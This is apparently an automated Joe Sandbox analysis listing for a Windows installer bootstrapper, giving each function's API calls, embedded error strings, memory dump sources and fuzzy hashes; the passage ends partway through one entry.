SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,000EB03E,?,00000001,00000000), ref: 000E9D0F
GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,000EB03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 000E9D19
CopyFileExW.KERNEL32(00000000,00000000,000E9B69,?,?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 000E9D67
GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,000EB03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 000E9D96

Strings

Failed attempt to copy payload from: '%ls' to: %ls., xrefs: 000E9DC8
copy, xrefs: 000E9CDD
Failed to clear readonly bit on payload destination path: %ls, xrefs: 000E9D48
BA aborted copy of payload from: '%ls' to: %ls., xrefs: 000E9D8F
apply.cpp, xrefs: 000E9D3D, 000E9D81, 000E9DBA

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLast$AttributesCopy
String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$copy
API String ID: 1969131206-836986073
Opcode ID: fa045419dc4fe1fac80925fc4885a3dac2127ac6b2c7604bdde3cf9fe856720f
Instruction ID: 664d00cd025514d9a5cb3dac35809514c604d1d7b9f6c978ebb803a992bb11d6
Opcode Fuzzy Hash: fa045419dc4fe1fac80925fc4885a3dac2127ac6b2c7604bdde3cf9fe856720f
Instruction Fuzzy Hash: 3D310972B45265BFDB209A97CC46EAF77A8EF41B10B258128BD04FB281E761DD01C7E1

Function 000D8EBC Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 126COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,?,00000001,80000005,?,00000000,00000000,00000000,00000003,000007D0), ref: 000D9007

Strings

Failed to allocate access for SYSTEM group to path: %ls, xrefs: 000D8F30
Failed to secure cache path: %ls, xrefs: 000D8FEA
Failed to create ACL to secure cache path: %ls, xrefs: 000D8FBB
cache.cpp, xrefs: 000D8FB0
Failed to allocate access for Users group to path: %ls, xrefs: 000D8F72
Failed to allocate access for Administrators group to path: %ls, xrefs: 000D8F0F
Failed to allocate access for Everyone group to path: %ls, xrefs: 000D8F51

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: FreeLocal
String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$cache.cpp
API String ID: 2826327444-4113288589
Opcode ID: 8c05ef0acfa7c9a1733e0a5ffdb33c208631f6971ed96eac826a12a10a25b1ea
Instruction ID: 01aa05cf25dd98f6300b7e5f5fbf2b302442832f4e325a3c5c8d5483f690001a
Opcode Fuzzy Hash: 8c05ef0acfa7c9a1733e0a5ffdb33c208631f6971ed96eac826a12a10a25b1ea
Instruction Fuzzy Hash: B841A532A44729BBDB3157508C46FEE7669EB50B10F1180B6BA04BA3C1DF71AE4487B1

Function 000D492F Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 117fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,crypt32.dll,00000008,?,00000000,?,00000000,00000000,crypt32.dll,00000000,?,?,?,00000000,?,00000000), ref: 000D495A
GetLastError.KERNEL32 ref: 000D4967
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 000D4A12
GetLastError.KERNEL32 ref: 000D4A1C

Strings

pipe.cpp, xrefs: 000D49C6, 000D49DD, 000D4A40
crypt32.dll, xrefs: 000D4956
Failed to read message from pipe., xrefs: 000D49E7
Failed to read data for message., xrefs: 000D4A4A
Failed to allocate data for message., xrefs: 000D49D0

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$crypt32.dll$pipe.cpp
API String ID: 1948546556-773887359
Opcode ID: 8ed1f99bd5c03d0a5834fbfd9dfcfba636aed4118d5b1af3002e8a52a817e9fa
Instruction ID: 91ec4eac26f2d8474a5153c224e04455208d68f65ceb513cc57f4646be8a97f4
Opcode Fuzzy Hash: 8ed1f99bd5c03d0a5834fbfd9dfcfba636aed4118d5b1af3002e8a52a817e9fa
Instruction Fuzzy Hash: 7431CB32D94329BBDB209BA58C45BAFF7A8FB04B21F11813AFD54A6241D7709D408BE5

Function 000DE2AF Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 104windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(?,00000001), ref: 000DE2E5
GetLastError.KERNEL32 ref: 000DE2F1
GetObjectW.GDI32(00000000,00000018,?), ref: 000DE338
GetCursorPos.USER32(?), ref: 000DE359
MonitorFromPoint.USER32(?,?,00000002), ref: 000DE36B
GetMonitorInfoW.USER32(00000000,?), ref: 000DE381

Strings

splashscreen.cpp, xrefs: 000DE315
(, xrefs: 000DE378
Failed to load splash screen bitmap., xrefs: 000DE31F

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Monitor$BitmapCursorErrorFromInfoLastLoadObjectPoint
String ID: ($Failed to load splash screen bitmap.$splashscreen.cpp
API String ID: 2342928100-598475503
Opcode ID: 4fa9ae954cda03c8f33c51963d1f7aafdd454f9afb898ae04b3a356ada4d4e49
Instruction ID: 4ac0ae0a93114a88609d9b271ecf9896228347230f6c82f3dff8b4244cbebf13
Opcode Fuzzy Hash: 4fa9ae954cda03c8f33c51963d1f7aafdd454f9afb898ae04b3a356ada4d4e49
Instruction Fuzzy Hash: EB312175A00319AFDB14DFA9D989A9EBBF4FF08710F148115F944EB285DB70E9448BA0

Function 000D50CA Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 84COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,?,?,0010B500), ref: 000D50D3
GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 000D5171
CloseHandle.KERNEL32(00000000), ref: 000D518A

Strings

runas, xrefs: 000D5131
open, xrefs: 000D513B, 000D5149
-q -%ls %ls %ls %u, xrefs: 000D50F8
Failed to launch elevated child process: %ls, xrefs: 000D515E
burn.elevated, xrefs: 000D50F3
Failed to allocate parameters for elevated process., xrefs: 000D510C

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Process$CloseCurrentHandle
String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
API String ID: 2815245435-1352204306
Opcode ID: 92f47a0b305dd8504b475fff56e4f986cfdd73959a51e8e0cd9eb9ee540350fb
Instruction ID: 5c0c5e4c04450c2b23de312fcfb9c90c45096ee7143992e2ccaf5c0d9c797744
Opcode Fuzzy Hash: 92f47a0b305dd8504b475fff56e4f986cfdd73959a51e8e0cd9eb9ee540350fb
Instruction Fuzzy Hash: E12166B9900609FFCF159F94CC81AEEBBB8FF08751B10816AF810A2251D7719E509BA0

Function 000C6882 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 000C68AC
GetProcAddress.KERNEL32(00000000), ref: 000C68B3
GetLastError.KERNEL32 ref: 000C68BD

Strings

Failed to get msi.dll version info., xrefs: 000C6905
Failed to find DllGetVersion entry point in msi.dll., xrefs: 000C68EB
variable.cpp, xrefs: 000C68E1
DllGetVersion, xrefs: 000C689E
msi, xrefs: 000C68A3
Failed to set variant value., xrefs: 000C6929

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$msi$variable.cpp
API String ID: 4275029093-842451892
Opcode ID: 1b108ac47e6e61c3c1bde6c62ad3032d2de47f12aed93e2ce349b93ff7090cc9
Instruction ID: ea9b0b1d8d6d96f8b01c4ce29f5efcbd7bf33e5140880c1130138a9f6fbeb607
Opcode Fuzzy Hash: 1b108ac47e6e61c3c1bde6c62ad3032d2de47f12aed93e2ce349b93ff7090cc9
Instruction Fuzzy Hash: A111B772A4063A76D7316BA9DC42FAF77A8DB04710F010119FD41F6181DBB59C4486E1

Function 000CD6C9 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,000C47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,000C548E,?), ref: 000CD6DA
GetLastError.KERNEL32(?,000C47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,000C548E,?,?), ref: 000CD6E7
GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 000CD71F
GetLastError.KERNEL32(?,000C47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,000C548E,?,?), ref: 000CD72B

Strings

Failed to load UX DLL., xrefs: 000CD712
userexperience.cpp, xrefs: 000CD708, 000CD74C
Failed to get BootstrapperApplicationCreate entry-point, xrefs: 000CD756
BootstrapperApplicationCreate, xrefs: 000CD719
Failed to create UX., xrefs: 000CD76F

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
API String ID: 1866314245-2276003667
Opcode ID: b7813dcd618493993aaad8684d0919a287ec82a658b457b55b8f417a02b373b5
Instruction ID: 2362c352951819308aed6368b2d6cae1c87a62d8c384b695b37bd8703acc9b6a
Opcode Fuzzy Hash: b7813dcd618493993aaad8684d0919a287ec82a658b457b55b8f417a02b373b5
Instruction Fuzzy Hash: D611C837A88733A7C73157945C06F5F66946B04761F02463EBE94EB6C0EBB1DC0086D0

Function 000C1175 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 53libraryloadermemoryCOMMON

Download Yara Rule

APIs

HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,000C111A,cabinet.dll,00000009,?,?,00000000), ref: 000C1186
GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,000C111A,cabinet.dll,00000009,?,?,00000000), ref: 000C1191
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000C119F
GetLastError.KERNEL32(?,?,?,?,?,000C111A,cabinet.dll,00000009,?,?,00000000), ref: 000C11BA
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000C11C2
GetLastError.KERNEL32(?,?,?,?,?,000C111A,cabinet.dll,00000009,?,?,00000000), ref: 000C11D7

Strings

kernel32, xrefs: 000C118C
SetDllDirectoryW, xrefs: 000C11BC
SetDefaultDllDirectories, xrefs: 000C1199

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AddressErrorLastProc$HandleHeapInformationModule
String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
API String ID: 3104334766-1824683568
Opcode ID: 764571b5cee92df4beb4ae61604fda8373a4aca99abc0e13e24c954a3a79ca54
Instruction ID: 83bb309d4f6e2be1db071e9a9d9b5dc4e0226c9e4cf8bbf4303ee1cb11ac7573
Opcode Fuzzy Hash: 764571b5cee92df4beb4ae61604fda8373a4aca99abc0e13e24c954a3a79ca54
Instruction Fuzzy Hash: EB01D831304316BBD7106BA69C89EAF7B6CFF42760B048015FD9592541DBB4D941CBF0

Function 000DF639 Relevance: 15.2, APIs: 2, Strings: 8, Instructions: 155COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 000DF64E
LeaveCriticalSection.KERNEL32(?), ref: 000DF7C9

Strings

Engine is active, cannot change engine state., xrefs: 000DF668
UX requested unknown payload with id: %ls, xrefs: 000DF6A3
Failed to set download password., xrefs: 000DF777
UX requested unknown container with id: %ls, xrefs: 000DF6F3
Failed to set download user., xrefs: 000DF751
UX denied while trying to set download URL on embedded payload: %ls, xrefs: 000DF6B9
Failed to set download URL., xrefs: 000DF728
UX did not provide container or payload id., xrefs: 000DF7B8

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
API String ID: 3168844106-2615595102
Opcode ID: 93c44dd95a8c56fbf7d84605090a7b0d2f549fc22101efb56d5eb6796256701b
Instruction ID: e2ead66d4e65fca7571d55fccd584eed099a3cdd2fcbe3dc6368addd06102945
Opcode Fuzzy Hash: 93c44dd95a8c56fbf7d84605090a7b0d2f549fc22101efb56d5eb6796256701b
Instruction Fuzzy Hash: 6341B332509713ABCB619B24C845FFAB7A8AF14710B14C137E816AB391EB71DC408BB1

Function 00105A5E Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,00000410,000000FF,?,00000000,00000000), ref: 00105A9B
GetLastError.KERNEL32 ref: 00105AA9
VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 00105AEA
GetLastError.KERNEL32 ref: 00105AF7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00105C6A
CloseHandle.KERNEL32(?), ref: 00105C79

Strings

GET, xrefs: 00105B9E
dlutil.cpp, xrefs: 00105ACD

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
String ID: GET$dlutil.cpp
API String ID: 2028584396-3303425918
Opcode ID: 50273df1d29e4c3994854eaf5485d571c14f5b686d11d24d380108c0f33c300c
Instruction ID: 04df12cfbd0026e39f42b5f72c8af29017062704acf4531c663e6e954d6113ec
Opcode Fuzzy Hash: 50273df1d29e4c3994854eaf5485d571c14f5b686d11d24d380108c0f33c300c
Instruction Fuzzy Hash: 9F617E71A0061AABDF11CF94CD85BEF7BBAAF48354F154119FD55A7280D7B0D9408F90

Function 000D0C50 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 000D1020: CompareStringW.KERNEL32(00000000,00000000,feclient.dll,000000FF,00000000,000000FF,00000000,00000000,?,?,000D0C6F,?,00000000,?,00000000,00000000), ref: 000D104F

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,00000000,?,00000000,00000001,?,?,00000000,?,00000000), ref: 000D0DF3
GetLastError.KERNEL32 ref: 000D0E00

Strings

plan.cpp, xrefs: 000D0E24
Failed to append package start action., xrefs: 000D0C95
Failed to append rollback cache action., xrefs: 000D0CCF
Failed to create syncpoint event., xrefs: 000D0E2E
Failed to append cache action., xrefs: 000D0D4A
Failed to append payload cache action., xrefs: 000D0DAA

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CompareCreateErrorEventLastString
String ID: Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
API String ID: 801187047-2489563283
Opcode ID: ae5c58d59cb8440be0a147e57dd505bccae9fc664707b4147e691fe895569808
Instruction ID: 978a7fbcf7731ab02992e71e0bc3278a11f85df41b363fdd589e30da5fa49516
Opcode Fuzzy Hash: ae5c58d59cb8440be0a147e57dd505bccae9fc664707b4147e691fe895569808
Instruction Fuzzy Hash: DB614D75500705EFCB15DF59C980AAABBFAFF84314F21845AE9099B312EB31EE41DB60

Function 000D05A2 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 133registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,0010B500,00000000,?), ref: 000D06D3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,0010B500,00000000,?), ref: 000D06E2

Part of subcall function 00100BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,000D061A,?,00000000,00020006), ref: 00100C0E

Strings

crypt32.dll, xrefs: 000D05AC
Failed to write volatile reboot required registry key., xrefs: 000D061E
%ls.RebootRequired, xrefs: 000D05F0
Failed to update resume mode., xrefs: 000D06B7
Failed to open registration key., xrefs: 000D071A
Failed to delete registration key: %ls, xrefs: 000D0681

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Close$Create
String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.$crypt32.dll
API String ID: 359002179-3398658923
Opcode ID: 6366925f91effc5241ff08de6952ec8cc5c67e094c0f2c918cfcc1135359f5fa
Instruction ID: 955bb36f0100decaa4947f0f1d20980b3aeade0b6e1771a0ea3f0d1821b7270c
Opcode Fuzzy Hash: 6366925f91effc5241ff08de6952ec8cc5c67e094c0f2c918cfcc1135359f5fa
Instruction Fuzzy Hash: A7418131900708FBDF22AF60DC06FAF7BB6EF94314F10442AF55961262D7729A60DA65

Function 00106C29 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 114COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,name,000000FF,00000000,00000000,00000000,?,774CDFD0), ref: 00106C88
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,email,000000FF), ref: 00106CA5
SysFreeString.OLEAUT32(00000000), ref: 00106CE3
SysFreeString.OLEAUT32(00000000), ref: 00106D27

Strings

name, xrefs: 00106C7A
uri, xrefs: 00106CB3
email, xrefs: 00106C97

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: String$CompareFree
String ID: email$name$uri
API String ID: 3589242889-1168628755
Opcode ID: c1933f24e6929279ff9b00a3a03cb1194b4b19ecedf94e64f5233306ffd84c63
Instruction ID: 9a7ed265381b9b697bac414cc3b698c7147b508d3e26bf9c763c525830806106
Opcode Fuzzy Hash: c1933f24e6929279ff9b00a3a03cb1194b4b19ecedf94e64f5233306ffd84c63
Instruction Fuzzy Hash: 9F416F35A05219FBDB119BD4CD45FADB778EF04721F2042A4E9A0AB2E0C7B19E60DB50

Function 000CF451 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 109stringCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 000CF48A

Part of subcall function 000C4115: CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,000DA0E8,00000000,00000000,?,00000000,000C53BD,00000000,?,?,000CD5B5,?), ref: 000C4123
Part of subcall function 000C4115: GetLastError.KERNEL32(?,000DA0E8,00000000,00000000,?,00000000,000C53BD,00000000,?,?,000CD5B5,?,00000000,00000000), ref: 000C4131

lstrlenA.KERNEL32(0010B500,00000000,00000094,00000000,00000094,?,?,000D04BF,swidtag,00000094,?,0010B518,000D04BF,00000000,?,00000000), ref: 000CF4DD

Part of subcall function 00104DB3: CreateFileW.KERNEL32(0010B500,40000000,00000001,00000000,00000002,00000080,00000000,000D04BF,00000000,?,000CF4F4,?,00000080,0010B500,00000000), ref: 00104DCB
Part of subcall function 00104DB3: GetLastError.KERNEL32(?,000CF4F4,?,00000080,0010B500,00000000,?,000D04BF,?,00000094,?,?,?,?,?,00000000), ref: 00104DD8

Strings

swidtag, xrefs: 000CF49D
Failed to allocate regid folder path., xrefs: 000CF53C
Failed to create regid folder: %ls, xrefs: 000CF525
Failed to allocate regid file path., xrefs: 000CF535
Failed to write tag xml to file: %ls, xrefs: 000CF51B
Failed to format tag folder path., xrefs: 000CF543

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CreateErrorLast$DirectoryFileOpen@16lstrlen
String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$swidtag
API String ID: 904508749-1201533908
Opcode ID: a1a0a59acb4c24256f07f91a1d636947db7214d268da9d389dca0fa6668125f2
Instruction ID: 35934c2f0073ed97391538336f1cc824b905458c536e9e4d8287197c3fd13e24
Opcode Fuzzy Hash: a1a0a59acb4c24256f07f91a1d636947db7214d268da9d389dca0fa6668125f2
Instruction Fuzzy Hash: CE314D71D0061ABBCB21AF94CC41FADBBB6AF14710F10817AFB14B6261D7B19E909B91

Function 000D53E2 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 91synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,?,00000000,00000000,00000000,000C548E,00000000,00000000,?,00000000), ref: 000D548B
GetLastError.KERNEL32(?,?,?,000C4C61,?,?,00000000,?,?,?,?,?,?,0010B4A0,?,?), ref: 000D5496

Strings

Failed to wait for child process exit., xrefs: 000D54C4
Failed to write exit code to message buffer., xrefs: 000D5406
pipe.cpp, xrefs: 000D54BA
Failed to post terminate message to child process., xrefs: 000D5476
Failed to write restart to message buffer., xrefs: 000D542E
